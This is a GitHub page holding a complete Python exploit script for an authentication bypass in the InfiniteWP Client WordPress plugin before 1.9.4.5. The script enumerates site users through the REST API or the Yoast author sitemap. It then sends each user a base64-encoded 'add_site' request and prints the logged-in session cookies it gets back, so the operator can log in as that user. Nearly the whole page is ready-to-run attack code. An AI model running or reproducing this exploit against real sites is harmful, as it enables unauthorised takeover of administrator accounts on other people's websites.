InfiniteWP-exploit/exploit.py at master · random-robbie/InfiniteWP-exploit · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
#
# InfiniteWP Client < 1.9.4.5 - Authentication Bypass
#
# Exploit Script By @random_robbie
#
# Requires Wordpress API Users Exposed!
#
# Based off https://0day.work/infinitewp-client-1-9-4-5-authentication-bypass/
#
import requests
import json
import sys
import base64
import argparse
import re
import os
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
session = requests.Session()


parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", required=True, help="Wordpress URL")
parser.add_argument("-m", "--method", required=True, help="Please Use -m rest for rest api or -m sitemap for yoast seo authors site map")
parser.add_argument("-p", "--proxy", default="",required=False, help="Proxy for debugging")
args = parser.parse_args()
url = args.url
method = args.method

if args.proxy:
	http_proxy = args.proxy
	os.environ['HTTP_PROXY'] = http_proxy
	os.environ['HTTPS_PROXY'] = http_proxy


def test_user(url,user):
	print(("[*] Testing User "+user+" [*]"))
	json_info = {"iwp_action":"add_site","params":{"username": user}}
	data="_IWP_JSON_PREFIX_{}".format(base64.b64encode(json.dumps(json_info).encode("utf-8")).decode("utf-8"))
	headers2 = {"User-Agent":"curl/7.67.0","Connection":"close","Accept":"*/*","Content-Type":"application/x-www-form-urlencoded"}
	response2 = session.post(url, data=data, headers=headers2,verify=False)
	if 'wordpress_logged_in' in str(response2.headers):
		print(("[*] Found Admin User: "+user+" [*]"))
		cookie_string = "; ".join([str(x)+"="+str(y) for x,y in list(response2.cookies.items())])
		if cookie_string:
			print(("[+] Use Cookies to Login: \n{}".format(cookie_string)))
	else:
            print('[-] "wordpress_logged_in" session token not present. Exploit apparently failed.')


def grab_users_api(url):
	headers = {"User-Agent":"curl/7.54.0","Connection":"close","Accept":"*/*"}
	response = session.get(""+url+"/wp-json/wp/v2/users", headers=headers,verify=False)
	if 'rest_user_cannot_view' in response.text:
		print ("[-] API Endpoint Requires Permissions\n")
		sys.exit()
	if response.status_code == 404:
		print ("[-] API Endpoint returns 404 Not Found\n")
		sys.exit(0)
	elif response.status_code == 200:
		print("[*] Users Found [*]")
		jsonstr = json.loads(response.content)
		for id in jsonstr:
			userid = str(id['id'])
			userint = id['id']
			user = id['slug']
			print(("[*] Found User: "+user+" with ID: "+userid+" [*]"))
			test_user(url,user)
	else:
            print('[-] REST  enum failed. Got respose code: {}'.format(response.status_code))

def grab_users_sitemap(url):
	headers = {"User-Agent":"curl/7.54.0","Connection":"close","Accept":"*/*"}
	response = session.get(""+url+"/author-sitemap.xml", headers=headers,verify=False)
	if response.status_code == 404:
		print("[-] No Author SiteMap Found - 404 [-]")
	elif response.status_code == 200:
		print("[*] Users Found [*]")
		auth = re.findall(r'(<loc>(.*?)</loc>)\s',response.content)
		for user in auth:
			thisuser = user[1]
			h = thisuser.split('/')
			realuser = h[4]
			test_user(url,realuser)
	else:
            print('[-] Sitemap enum failed. Got response code: {}'.format(response.status_code))

if method == "rest":
	grab_users_api(url)
elif method == "sitemap":
	grab_users_sitemap(url)
else:
	print ("Please Choose Method of rest or sitemap")